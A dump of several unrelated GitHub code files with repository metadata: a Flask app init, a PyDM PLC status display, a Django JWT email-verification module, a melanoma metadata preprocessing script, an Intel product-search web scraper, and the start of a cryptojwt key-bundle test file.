debug')\napp.logger.info('Questo è info')\napp.logger.warning('Questo è warning')\napp.logger.error('Questo è error')\n\n\n\nimport Concorso.views\nfrom .model import User\n\n\n\n\n@login_manager.user_loader\ndef user_loader(user_id):\n \"\"\"Given *user_id*, return the associated User object.\n\n :param unicode user_id: user_id (email) user to retrieve\n\n \"\"\"\n return User.query.get(user_id)","repo_name":"jourus/ConcorsoFotografico","sub_path":"Concorso/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27529878980","text":"import functools\nimport itertools\nfrom string import Template\n\nfrom pydm import Display\nfrom pydm.widgets import PyDMLabel\nfrom pydm.widgets.byte import PyDMBitIndicator\nfrom pydm.widgets.channel import PyDMChannel\nfrom qtpy import QtWidgets\nfrom qtpy.QtGui import QColor\n\nfrom fast_faults import clear_channel\n\n\nclass PLCIOCStatus(Display):\n _on_color = QColor(0, 255, 0)\n _off_color = QColor(100, 100, 100)\n plc_status_ch = None\n\n def __init__(self, parent=None, args=None, macros=None):\n super().__init__(parent=parent, args=args, macros=macros)\n self.config = macros\n self.ffs_count_map = {}\n self.ffs_label_map = {}\n self.setup_ui()\n for ch in (\n self.plc_status_ch,\n self.plc_task1_vis_ch,\n self.plc_task2_vis_ch,\n self.plc_task3_vis_ch,\n ):\n self.destroyed.connect(functools.partial(clear_channel, ch))\n\n def setup_ui(self):\n self.setup_plc_ioc_status()\n\n def setup_plc_ioc_status(self):\n ffs = self.config.get('fastfaults')\n if not ffs:\n return\n if self.plc_ioc_container is None:\n return\n\n grid = self.ui.plc_ioc_container.layout()\n self.task_vis_data = {}\n\n for row, ff in enumerate(ffs):\n prefix = ff.get('prefix')\n ffo_start = ff.get('ffo_start')\n ffo_end = ff.get('ffo_end')\n ff_start = ff.get('ff_start')\n ff_end = 
ff.get('ff_end')\n\n ffos_zfill = len(str(ffo_end)) + 1\n ffs_zfill = len(str(ff_end)) + 1\n entries = itertools.product(\n range(ffo_start, ffo_end + 1),\n range(ff_start, ff_end + 1)\n )\n\n plc_name = prefix.strip(':')\n plc_macros = dict(P=prefix)\n # get the heartbeat of the IOC to\n ico_heart_ch = Template(\n 'ca://${P}HEARTBEAT').safe_substitute(**plc_macros)\n # the get PLC process cycle count\n plc_task_info_1 = Template(\n 'ca://${P}TaskInfo:1:CycleCount').safe_substitute(**plc_macros)\n plc_task_info_2 = Template(\n 'ca://${P}TaskInfo:2:CycleCount').safe_substitute(**plc_macros)\n plc_task_info_3 = Template(\n 'ca://${P}TaskInfo:3:CycleCount').safe_substitute(**plc_macros)\n\n label_name = QtWidgets.QLabel(str(plc_name))\n label_online = QtWidgets.QLabel()\n label_in_use = QtWidgets.QLabel()\n label_alarmed = QtWidgets.QLabel()\n label_heartbeat = PyDMLabel(init_channel=ico_heart_ch)\n label_plc_task_info_1 = PyDMLabel(init_channel=plc_task_info_1)\n label_plc_task_info_2 = PyDMLabel(init_channel=plc_task_info_2)\n label_plc_task_info_3 = PyDMLabel(init_channel=plc_task_info_3)\n\n # if alarm of plc_task_info_1 == INVALID => plc down\n # if the count does not update and alarm == NO_ALARM =>\n # plc online but stopped\n self.plc_status_ch = PyDMChannel(\n plc_task_info_1,\n severity_slot=functools.partial(\n self.plc_cycle_count_severity_changed, plc_name))\n self.plc_status_ch.connect()\n\n # if we can get the plc_cycle_count the PLC should be ON, if not OFF\n # if we get the plc_cycle_count and the .SERV is INVALID, the PLC is OFF\n plc_status_indicator = PyDMBitIndicator(circle=True)\n plc_status_indicator.setColor(self._off_color)\n # TODO - maybe add the case where PLC On but stopped\n\n # Handle the visibility of task 2 and 3 info\n # Not every PLC has tasks 2 and 3\n # These should be shown if they are valid or if they are nonzero\n # These should be hidden if they are both 0 and invalid while\n # task1 is still valid\n # If task1 is invalid display all 3 (val of task1 irrelevant)\n # I need to collect/cache a value and then show/hide appropriately\n self.task_vis_data[plc_name] = {\n 'task1': {\n 'value': 0,\n 'sevr': 3,\n 'conn': False,\n },\n 'task2': {\n 'value': 0,\n 'sevr': 3,\n 'conn': False,\n },\n 'task3': {\n 'value': 0,\n 'sevr': 3,\n 'conn': False,\n },\n }\n self.plc_task1_vis_ch = PyDMChannel(\n plc_task_info_1,\n severity_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task1',\n value_type='sevr',\n widget=None,\n ),\n )\n self.plc_task1_vis_ch.connect()\n self.plc_task2_vis_ch = PyDMChannel(\n plc_task_info_2,\n value_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task2',\n value_type='value',\n widget=label_plc_task_info_2,\n ),\n severity_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task2',\n value_type='sevr',\n widget=label_plc_task_info_2,\n ),\n connection_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task2',\n value_type='conn',\n widget=label_plc_task_info_2,\n ),\n )\n self.plc_task2_vis_ch.connect()\n self.plc_task3_vis_ch = PyDMChannel(\n plc_task_info_3,\n value_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task3',\n value_type='value',\n widget=label_plc_task_info_3,\n ),\n severity_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task3',\n value_type='sevr',\n widget=label_plc_task_info_3,\n ),\n 
connection_slot=functools.partial(\n self.update_task_visibility,\n plc_name=plc_name,\n task='task3',\n value_type='conn',\n widget=label_plc_task_info_3,\n ),\n )\n self.plc_task3_vis_ch.connect()\n\n # total initial number of ffs to initialize the dictionaries with\n # num_ffo * num_ff\n all_ffos = ((ffo_end - ffo_start) + 1) * (ff_end - ff_start + 1)\n self.ffs_count_map[plc_name] = {'online': [False]*all_ffos,\n 'in_use': [False]*all_ffos,\n 'alarmed': [False]*all_ffos,\n 'plc_status': False}\n self.ffs_label_map[plc_name] = {'online': label_online,\n 'in_use': label_in_use,\n 'alarmed': label_alarmed,\n 'plc_status': plc_status_indicator}\n\n count = 0\n for _ffo, _ff in entries:\n s_ffo = str(_ffo).zfill(ffos_zfill)\n s_ff = str(_ff).zfill(ffs_zfill)\n ch_macros = dict(index=count, P=prefix, FFO=s_ffo, FF=s_ff)\n\n ch = Template(\n 'ca://${P}FFO:${FFO}:FF:${FF}:Info:InUse_RBV').safe_substitute(**ch_macros)\n channel = PyDMChannel(\n ch,\n connection_slot=functools.partial(\n self.ffo_connection_callback, plc_name, count),\n value_slot=functools.partial(\n self.ffo_value_changed, plc_name, count),\n severity_slot=functools.partial(\n self.ffo_severity_changed, plc_name, count))\n # should not be adding a new connection because this address\n # already exists in the connections,\n # instead should just add a listener\n channel.connect()\n count += 1\n\n # this is the same width as the labels in the plc_ioc_header\n max_width = 150\n min_width = 130\n max_height = 30\n min_height = 30\n widget_list = [label_name, label_online, label_in_use,\n label_alarmed, label_heartbeat,\n label_plc_task_info_1, label_plc_task_info_2,\n label_plc_task_info_3, plc_status_indicator]\n\n self.setup_widget_size(\n max_width=max_width,\n min_width=min_width,\n max_height=max_height,\n min_height=min_height,\n widget_list=widget_list,\n )\n\n grid.addWidget(label_name, row, 0)\n grid.addWidget(label_online, row, 1)\n grid.addWidget(label_in_use, row, 2)\n grid.addWidget(label_alarmed, row, 3)\n grid.addWidget(label_heartbeat, row, 4)\n grid.addWidget(label_plc_task_info_1, row, 5)\n grid.addWidget(label_plc_task_info_2, row, 6)\n grid.addWidget(label_plc_task_info_3, row, 7)\n grid.addWidget(plc_status_indicator, row, 8)\n\n b_vertical_spacer = (\n QtWidgets.QSpacerItem(20, 20,\n QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Expanding))\n grid.addItem(b_vertical_spacer, row + 1, 0)\n self.plc_ioc_container.setSizePolicy(QtWidgets.QSizePolicy.Maximum,\n QtWidgets.QSizePolicy.Preferred)\n\n def setup_widget_size(\n self,\n max_width,\n min_width,\n max_height,\n min_height,\n widget_list,\n ):\n for widget in widget_list:\n widget.setMinimumWidth(min_width)\n widget.setMaximumWidth(max_width)\n widget.setMinimumHeight(min_height)\n widget.setMaximumHeight(max_height)\n\n def plc_cycle_count_severity_changed(self, key, alarm):\n \"\"\"\n Process PLC Cycle Count PV severity change.\n\n This targets only the first cycle counter. 
When the first\n        cycle counter goes \"Invalid\", mark PLC status as bad.\n        Otherwise, PLC status is good.\n\n        Parameters\n        ----------\n        key : str\n            Prefix of PLC\n        alarm : int\n            New alarm.\n\n        Note\n        ----\n        alarm == 0 => NO_ALARM, if NO_ALARM and counter does not change,\n        PLC is still online but stopped\n        alarm == 3 => INVALID - PLC is Offline\n        \"\"\"\n        plc = self.ffs_count_map.get(key)\n        if alarm == 3:\n            plc['plc_status'] = False\n        else:\n            plc['plc_status'] = True\n        self.update_status_labels(key)\n\n    def update_task_visibility(\n        self,\n        value,\n        plc_name,\n        task,\n        value_type,\n        widget,\n    ):\n        \"\"\"\n        Check if tasks 2 or 3 are valid to be shown.\n\n        The goal is that we shouldn't show invalid channels unless\n        they are true errors. The conditions for a non-error\n        expected \"bad\" state on counts 2 or 3 are:\n\n        - Task count 1 is valid\n        - Task counts 2 or 3 are 0 and invalid\n\n        Task 1 being invalid is always a bad state.\n        Task 2 or 3 being nonzero and invalid is also a bad state.\n        This usually means the PLC has crashed.\n\n        Task 2 or 3 being disconnected is fine - that might just mean\n        we've updated to ads-ioc R0.6.0.\n        Task 1 being disconnected is always a problem.\n        \"\"\"\n        plc_data = self.task_vis_data[plc_name]\n        task_data = plc_data[task]\n        task_data[value_type] = value\n        if widget is None:\n            return\n        if all((\n            plc_data['task1']['sevr'] == 0,\n            task_data['value'] == 0,\n            task_data['sevr'] == 3,\n        )):\n            widget.hide()\n        elif task in ('task2', 'task3') and not task_data['conn']:\n            widget.hide()\n        else:\n            widget.show()\n\n    def ffo_connection_callback(self, key, idx, conn):\n        # Update ffos count for connected In_Use PVs\n        plc = self.ffs_count_map.get(key)\n        plc['online'][idx] = conn\n        # Call routine to update proper label\n        self.update_plc_labels(key)\n\n    def ffo_value_changed(self, key, idx, value):\n        # Update ffos count for In_Use == True PVs\n        plc = self.ffs_count_map.get(key)\n        plc['in_use'][idx] = value\n        self.update_plc_labels(key)\n\n    def ffo_severity_changed(self, key, idx, alarm):\n        # 0 = NO_ALARM, 1 = MINOR, 2 = MAJOR, 3 = INVALID\n        plc = self.ffs_count_map.get(key)\n        if alarm != 0:\n            plc['alarmed'][idx] = True\n        else:\n            plc['alarmed'][idx] = False\n        self.update_plc_labels(key)\n\n    def update_plc_labels(self, key):\n        # Fetch value from count\n        # TODO maybe have some checks here....?\n        counts = self.ffs_count_map.get(key)\n        online_cnt = sum(counts['online'])\n        in_use_cnt = sum(counts['in_use'])\n        alarmed_cnt = sum(counts['alarmed'])\n        # Pick the label from the map\n        # Update label with new count\n        labels = self.ffs_label_map.get(key)\n        labels['online'].setText(str(online_cnt))\n        labels['in_use'].setText(str(in_use_cnt))\n        labels['alarmed'].setText(str(alarmed_cnt))\n\n    def update_status_labels(self, key):\n        status = self.ffs_count_map.get(key)\n        plc_status = status['plc_status']\n        labels = self.ffs_label_map.get(key)\n        if plc_status is True:\n            labels['plc_status'].setColor(self._on_color)\n        else:\n            labels['plc_status'].setColor(self._off_color)\n\n    def ui_filename(self):\n        return 'plc_ioc_status.ui'\n","repo_name":"pcdshub/pmps-ui","sub_path":"plc_ioc_status.py","file_name":"plc_ioc_status.py","file_ext":"py","file_size_in_byte":14535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4155083561","text":"import functools\nimport logging\nfrom threading import Thread\nfrom typing import Callable\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template import 
Template, Context\nfrom django.template.loader import render_to_string\nfrom django.urls import get_resolver\nfrom django.utils import timezone\n\nfrom datetime import datetime\n\nimport jwt\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\n\n\nclass EmailVerificationTokenGenerator:\n \"\"\"\n Strategy object used to generate and check tokens for the password\n reset mechanism.\n \"\"\"\n try:\n key_salt = settings.CUSTOM_SALT\n except AttributeError:\n key_salt = \"django-email-verification.token\"\n algorithm = None\n secret = settings.SECRET_KEY\n\n def make_token(self, user, expiry=None):\n \"\"\"\n Return a token that can be used once to do a password reset\n for the given user.\n\n Args:\n user (Model): the user\n expiry (datetime): optional forced expiry date\n\n Returns:\n (tuple): tuple containing:\n token (str): the token\n expiry (datetime): the expiry datetime\n \"\"\"\n exp = (self._now() + settings.EMAIL_TOKEN_LIFE) if expiry is None else int(expiry.timestamp())\n payload = {'email': user.email, 'exp': exp}\n return jwt.encode(payload, self.secret, algorithm='HS256'), datetime.fromtimestamp(exp)\n\n def check_token(self, token):\n \"\"\"\n Check that a password reset token is correct.\n Args:\n token (str): the token from the url\n\n Returns:\n (tuple): tuple containing:\n valid (bool): True if the token is valid\n user (Model): the user model if the token is valid\n \"\"\"\n\n try:\n payload = jwt.decode(token, self.secret, algorithms=['HS256'])\n email, exp = payload['email'], payload['exp']\n \"\"\"\n if hasattr(settings, 'EMAIL_MULTI_USER') and settings.EMAIL_MULTI_USER:\n users = get_user_model().objects.filter(email=email)\n else:\n \"\"\"\n users = [get_user_model().objects.filter(email=email).order_by(\"created_at\").last()]\n except (ValueError, get_user_model().DoesNotExist, jwt.DecodeError, jwt.ExpiredSignatureError):\n return False, None\n\n if not len(users) or users[0] is None:\n return False, None\n\n return True, users[0]\n\n @staticmethod\n def _now():\n return datetime.now().timestamp()\n\n\ndefault_token_generator = EmailVerificationTokenGenerator()\n\nlogger = logging.getLogger('django_email_verification')\nDJANGO_EMAIL_VERIFICATION_MORE_VIEWS_ERROR = 'ERROR: more than one verify view found'\nDJANGO_EMAIL_VERIFICATION_NO_VIEWS_ERROR = 'ERROR: no verify view found'\nDJANGO_EMAIL_VERIFICATION_NO_PARAMETER_WARNING = 'WARNING: found verify view without parameter'\n\n\ndef send_email(user, thread=True, **kwargs):\n try:\n user.save()\n\n expiry_ = kwargs.get('expiry')\n token, expiry = default_token_generator.make_token(user, expiry_)\n\n senderr = _get_validated_field('EMAIL_FROM_ADDRESS')\n domain = _get_validated_field('EMAIL_PAGE_DOMAIN')\n subject = _get_validated_field('EMAIL_MAIL_SUBJECT')\n mail_plain = _get_validated_field('EMAIL_MAIL_PLAIN')\n mail_html = _get_validated_field('EMAIL_MAIL_HTML')\n\n args = (user, token, expiry, senderr, domain, subject, mail_plain, mail_html)\n if thread:\n t = Thread(target=send_email_thread, args=args)\n t.start()\n else:\n send_email_thread(*args)\n except AttributeError:\n raise Exception('The user model you provided is invalid')\n\n\ndef send_email_thread(user, token, expiry, senderr, domain, subject, mail_plain, mail_html):\n domain += '/' if not domain.endswith('/') else ''\n\n def has_decorator(k):\n if callable(k):\n return k.__dict__.get('django_email_verification_view_id', False)\n return False\n\n d = [v[0][0] for k, v in get_resolver(None).reverse_dict.items() if 
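    # This comprehension scans Django's URL resolver for callables tagged by
    # the @verify_view decorator (which sets django_email_verification_view_id
    # on the view); it is how the library discovers which route should receive
    # the generated token.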
has_decorator(k)]\n w = [a[0] for a in d if a[1] == []]\n d = [a[0][:a[0].index('%')] for a in d if a[1] != []]\n\n if len(w) > 0:\n print(f'{DJANGO_EMAIL_VERIFICATION_NO_PARAMETER_WARNING}: {w}')\n\n if len(d) < 1:\n print(DJANGO_EMAIL_VERIFICATION_NO_VIEWS_ERROR)\n return\n\n if len(d) > 1:\n print(f'{DJANGO_EMAIL_VERIFICATION_MORE_VIEWS_ERROR}: {d}')\n return\n try:\n context = {'link': domain + d[0] + str(token), 'expiry': expiry, 'user': user}\n except Exception as e:\n print(e)\n\n subject = Template(subject).render(Context(context))\n\n text = render_to_string(mail_plain, context)\n\n html = render_to_string(mail_html, context)\n\n msg = EmailMultiAlternatives(subject, text, senderr, [user.email])\n msg.attach_alternative(html, 'text/html')\n msg.send()\n print(f\"Sending email confirmation to user {user}\")\n\n\ndef _get_validated_field(field, default_type=None):\n if default_type is None:\n default_type = str\n try:\n d = getattr(settings, field)\n if d == \"\" or d is None or not isinstance(d, default_type):\n raise AttributeError\n return d\n except AttributeError:\n raise Exception(f\"Field {field} missing or invalid\")\n\n\ndef verify_token(token):\n valid, user = default_token_generator.check_token(token)\n if valid:\n callback = _get_validated_field('EMAIL_VERIFIED_CALLBACK', default_type=Callable)\n if hasattr(user, callback.__name__):\n getattr(user, callback.__name__)()\n else:\n callback(user)\n user.last_login = timezone.now()\n user.save()\n return valid, user\n return False, None\n\n\ndef verify_view(func):\n func.django_email_verification_view_id = True\n\n @functools.wraps(func)\n def verify_function_wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return verify_function_wrapper\n","repo_name":"laylay1234/bemoSender-API","sub_path":"bemoSender-API/utils/email_verification.py","file_name":"email_verification.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15802705480","text":"import os\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom PIL import Image\nfrom tqdm import tqdm\n\nif __name__==\"__main__\":\n input_path = \"/home/dragoshh1984/repos/kaggle/datasets/melanomia_classification/\"\n train_path = \"/home/dragoshh1984/repos/kaggle/datasets/melanomia_classification/512x512-dataset-melanoma/512x512-dataset-melanoma\"\n test_path = \"/home/dragoshh1984/repos/kaggle/datasets/melanomia_classification/512x512-test/512x512-test\"\n\n df_train = pd.read_csv(os.path.join(input_path, \"folds_big.csv\"))\n df_test = pd.read_csv(os.path.join(input_path, \"test.csv\"))\n df_test = df_test.rename(columns={\"image_name\": \"image_id\"})\n\n df_train['sex'] = df_train['sex'].fillna('unknown')\n df_train['anatom_site_general_challenge'] = df_train['anatom_site_general_challenge'].fillna('unknown')\n df_train['age_approx'] = df_train['age_approx'].fillna(round(df_train['age_approx'].mean()))\n\n df_test['sex'] = df_test['sex'].fillna('unknown')\n df_test['anatom_site_general_challenge'] = df_test['anatom_site_general_challenge'].fillna('unknown')\n df_test['age_approx'] = df_test['age_approx'].fillna(round(df_test['age_approx'].mean()))\n\n # get color mean\n train_means = []\n for image_name in tqdm(df_train.image_id):\n color_mean = np.array(Image.open(os.path.join(train_path, f\"{image_name}.jpg\"))).mean()\n train_means.append(color_mean)\n df_train.loc[:, 'color_mean'] = train_means\n\n test_means = []\n for 
image_name in tqdm(df_test.image_id):\n color_mean = np.array(Image.open(os.path.join(test_path, f\"{image_name}.jpg\"))).mean()\n test_means.append(color_mean)\n df_test.loc[:, 'color_mean'] = test_means\n\n # label anatom_challenge\n le = LabelEncoder()\n types = df_train['anatom_site_general_challenge'].unique()\n df_train['anatom_site_general_challenge'] = le.fit_transform(df_train['anatom_site_general_challenge'])\n\n types = df_test['anatom_site_general_challenge'].unique()\n df_test['anatom_site_general_challenge'] = le.fit_transform(df_test['anatom_site_general_challenge'])\n\n # encode sex\n types = df_train['sex'].unique()\n df_train['sex'] = le.fit_transform(df_train['sex'])\n\n types = df_test['sex'].unique()\n df_test['sex'] = le.fit_transform(df_test['sex'])\n\n df_train.to_csv(os.path.join(input_path, \"new_train.csv\"), index=False)\n df_test.to_csv(os.path.join(input_path, \"new_test.csv\"), index=False)\n# df_folds.loc[:, 'fold'] = 0","repo_name":"dragoshh1984/melanomia-classification","sub_path":"metadata_augmentation.py","file_name":"metadata_augmentation.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13808078702","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\nfrom datetime import datetime\r\nimport time\r\nimport warnings\r\nwarnings.simplefilter(action='ignore', category=FutureWarning) #filters pandas .append futurewarning messages\r\nfrom selenium import webdriver\r\n\r\n\r\n#web-scraping extractor for product data - specify terms internally or via external document to feed in\r\ndef selenium_bs4_extractor(terms, web_driver_file_location):\r\n results_df = pd.DataFrame()\r\n for term in terms:\r\n url = f'https://www.intel.com/content/www/us/en/search.html?ws=text#q={term}&sort=%40lastmodifieddt%20descending&f:@tabfilter=[Developers]'\r\n driver = webdriver.Chrome(web_driver_file_location)\r\n driver.get(url)\r\n time.sleep(10)\r\n X_Path_Show_More = '//*[@id=\"viewFullDescLink\"]'\r\n elements = driver.find_elements_by_xpath(X_Path_Show_More)\r\n for element in elements:\r\n driver.execute_script(\"arguments[0].click();\", element)\r\n X_Path_Next_Page = '//*[@id=\"result-section\"]/div[9]/ul/li[8]/span'\r\n time.sleep(5)\r\n soup=BeautifulSoup(driver.page_source,'html.parser')\r\n page_counter = 1 #used for T/S purposes and error tracking\r\n try:\r\n max_page_count_combined = soup.find('li', {'class': 'coveo-pager-total', 'style':'display: inline-block;'}).text\r\n max_page_count = int(re.sub('of','', str(max_page_count_combined))) + 1\r\n except:\r\n max_page_count = 2 #only one page available to pull from\r\n #intermediate_terms_df = pd.DataFrame() #creating intermediate df for troubleshooting purposes, optional\r\n while page_counter < max_page_count:\r\n time.sleep(5)\r\n soup=BeautifulSoup(driver.page_source,'html.parser')\r\n elements = driver.find_elements_by_xpath(X_Path_Show_More)\r\n try:\r\n for element in elements:\r\n driver.execute_script(\"arguments[0].click();\", element)\r\n all_results = soup.find_all(\"div\", {\"class\": \"mobviewBtn\"})\r\n for item in all_results:\r\n version = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@version\"}) # version field\r\n if version is None:\r\n version = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@allversions\"})\r\n else:\r\n pass\r\n version = 
version.get_text().strip()\r\n # version_number = re.findall('\\d+\\.\\d+', str(version))\r\n try:\r\n version = re.sub('Version: ', '', str(version))\r\n except:\r\n pass\r\n for id_num in item.find_all(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@docuniqueid\"}): #_id field\r\n #print(int(s) for s in item.get_text().strip().split() if s.isdigit())\r\n item_adjusted = str(id_num.get_text().strip()).replace(\" \", \"\")\r\n lists = re.findall('\\d+',item_adjusted)\r\n for i in lists:\r\n if i == \"\":\r\n del i\r\n else:\r\n id = i\r\n try:\r\n description = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@description\",\"data-html-value\": \"true\"})\r\n description = description.get_text().strip()\r\n except:\r\n #description = item.find(\"span\", {\"class\": \"viewFullDesc\"})\r\n description = item.find(\"span\", {\"class\": \"fullDesc\"})\r\n description.a.clear()\r\n description = description.get_text().strip()\r\n date_raw = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@lastmodifieddt\",\"data-helper\": \"dateFormat\"})\r\n #print(item.get_text().strip())\r\n # searching string\r\n match_str = re.search(r'\\d{2}/\\d{2}/\\d{4}', str(date_raw))\r\n # computed date\r\n # feeding format\r\n date = datetime.strptime(match_str.group(), '%m/%d/%Y').date()\r\n name = item.find(\"a\", {\"class\": \"CoveoResultLink\"})\r\n name = name.get_text().strip()\r\n try:\r\n web_link = item.find(\"a\", {\"aria-label\": f\"{name}\", \"data-field\": \"@secondaryurl\"})['href']\r\n web_link = str('https://intel.com') + str(web_link)\r\n except:\r\n web_link = ''\r\n multiple_coveos_first = item.find(\"div\", {\"class\":\"coveo-result-cell mobile\"})\r\n next_siblings = multiple_coveos_first.find_next_siblings(\"div\", {\"class\":\"coveo-result-cell mobile\"})\r\n file_full = next_siblings[0].text.strip()\r\n file_adjusted = re.sub('File: ','',file_full)\r\n content_type_full = next_siblings[1].text.strip()\r\n content_type_adjusted = re.sub('Content Type: ', '', content_type_full)\r\n results_dict = {'search_term': term,\r\n 'version': version,\r\n '_id': id,\r\n 'description': description,\r\n 'date': date,\r\n 'file': file_adjusted,\r\n 'content_type': content_type_adjusted,\r\n 'name': name,\r\n 'web_link': web_link\r\n }\r\n results_df = results_df.append(results_dict, ignore_index=True)\r\n #intermediate_terms_df.append(results_dict, ignore_index=True) #optional, intermediate df for troubleshooting\r\n except:\r\n print(f'error on page {page_counter} for term {term} encountered')\r\n pass\r\n try:\r\n driver.find_element_by_xpath(X_Path_Next_Page).click()\r\n except:\r\n time.sleep(5)\r\n try:\r\n driver.find_element_by_xpath(X_Path_Next_Page).click()\r\n except:\r\n print(f'page_counter at value of {page_counter} with recorded maximum of {max_page_count}')\r\n time.sleep(5)\r\n page_counter += 1\r\n # print(page_counter)\r\n\r\n #intermediate_terms_df.to_csv(INSERT_PATH_HERE_IF_DESIRED, encoding='utf-8') #for troubleshooting, optional\r\n driver.close()\r\n return results_df\r\n\r\nif __name__ == \"__main__\":\r\n # setting up webdriver for scraping\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--headless')\r\n # client terms list to loop through\r\n terms = ['processor','future', \"'cutting%20edge'\"] #terms can either be directly added into a list or put into an outside file to load as an argument for automation\r\n web_driver_file_location = r'C:\\Users\\insert_file_path_here_for_web_driver'\r\n results_df = 
selenium_bs4_extractor(terms, web_driver_file_location)\r\n output_file_location = r'C:\\Users\\insert_file_path_here'\r\n results_df.to_csv(output_file_location, encoding='utf-8')\r\n","repo_name":"dlabban/web_scrapers","sub_path":"intel_products_scraper/intel_product_search_web_scraper_publicedit.py","file_name":"intel_product_search_web_scraper_publicedit.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8261629569","text":"# pylint: disable=missing-docstring,no-self-use\nimport json\nimport os\nimport shutil\nimport time\nfrom pathlib import Path\n\nimport pytest\nimport requests\nimport responses\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\nfrom cryptojwt.exception import UnknownKeyType\nfrom cryptojwt.jwk.ec import ECKey\nfrom cryptojwt.jwk.ec import new_ec_key\nfrom cryptojwt.jwk.hmac import SYMKey\nfrom cryptojwt.jwk.okp import OKPKey\nfrom cryptojwt.jwk.okp import new_okp_key\nfrom cryptojwt.jwk.rsa import RSAKey\nfrom cryptojwt.jwk.rsa import import_rsa_key_from_cert_file\nfrom cryptojwt.jwk.rsa import new_rsa_key\nfrom cryptojwt.key_bundle import KeyBundle\nfrom cryptojwt.key_bundle import UpdateFailed\nfrom cryptojwt.key_bundle import build_key_bundle\nfrom cryptojwt.key_bundle import dump_jwks\nfrom cryptojwt.key_bundle import init_key\nfrom cryptojwt.key_bundle import key_diff\nfrom cryptojwt.key_bundle import key_gen\nfrom cryptojwt.key_bundle import key_rollover\nfrom cryptojwt.key_bundle import keybundle_from_local_file\nfrom cryptojwt.key_bundle import rsa_init\nfrom cryptojwt.key_bundle import unique_keys\nfrom cryptojwt.key_bundle import update_key_bundle\n\n__author__ = \"Roland Hedberg\"\n\nBASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), \"test_keys\"))\n\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n\n\ndef full_path(local_file):\n return os.path.join(BASEDIR, local_file)\n\n\nRSAKEY = os.path.join(BASE_PATH, \"cert.key\")\nRSA0 = os.path.join(BASE_PATH, \"rsa.key\")\nEC0 = os.path.join(BASE_PATH, \"ec.key\")\nCERT = full_path(\"cert.pem\")\n\nJWK0 = {\n \"keys\": [\n {\n \"kty\": \"RSA\",\n \"e\": \"AQAB\",\n \"kid\": \"abc\",\n \"n\": \"wf-wiusGhA-gleZYQAOPQlNUIucPiqXdPVyieDqQbXXOPBe3nuggtVzeq7pVFH1dZz4dY\"\n \"2Q2LA5DaegvP8kRvoSB_87ds3dy3Rfym_GUSc5B0l1TgEobcyaep8jguRoHto6GWHfCfK\"\n \"qoUYZq4N8vh4LLMQwLR6zi6Jtu82nB5k8\",\n }\n ]\n}\n\nJWK1 = {\n \"keys\": [\n {\n \"n\": \"zkpUgEgXICI54blf6iWiD2RbMDCOO1jV0VSff1MFFnujM4othfMsad7H1kRo50YM5S\"\n \"_X9TdvrpdOfpz5aBaKFhT6Ziv0nhtcekq1eRl8mjBlvGKCE5XGk-0LFSDwvqgkJoFY\"\n \"Inq7bu0a4JEzKs5AyJY75YlGh879k1Uu2Sv3ZZOunfV1O1Orta-NvS-aG_jN5cstVb\"\n \"CGWE20H0vFVrJKNx0Zf-u-aA-syM4uX7wdWgQ-owoEMHge0GmGgzso2lwOYf_4znan\"\n \"LwEuO3p5aabEaFoKNR4K6GjQcjBcYmDEE4CtfRU9AEmhcD1kleiTB9TjPWkgDmT9MX\"\n \"sGxBHf3AKT5w\",\n \"e\": \"AQAB\",\n \"kty\": \"RSA\",\n \"kid\": \"rsa1\",\n },\n {\n \"k\": \"YTEyZjBlMDgxMGI4YWU4Y2JjZDFiYTFlZTBjYzljNDU3YWM0ZWNiNzhmNmFlYTNkNT\" \"Y0NzMzYjE\",\n \"kty\": \"oct\",\n },\n ]\n}\n\nJWK2 = {\n \"keys\": [\n {\n \"e\": \"AQAB\",\n \"kid\": \"R3NJRW1EVHRsaUcwSXVydi14cVVoTmxhaU4zckU1MlFPa05NWGNpUUZtcw\",\n \"kty\": \"RSA\",\n \"n\": \"rp7aJD9FKKHQgLTeXLMyjB5TS51x_KqA15gBJHF2Ps-rrmcBujpMAi39D7w4\"\n \"SArr9X7DPgHekTPRV6-i46TyqnY1EXPGRb0nCg0rCmkyOAMysXhhuexu3vS7\"\n \"Fa2YPvX2zpl5svdkOOwLmHBplCTtvScz-L7N1xeknauOLF5Ct39C5Ipv-BWx\"\n \"bNrqD68uIPSOH9ZsoGKVArSI0MSmw5LB7B3i30D8FvmlJyxcEPZOFVahFCmS\"\n 
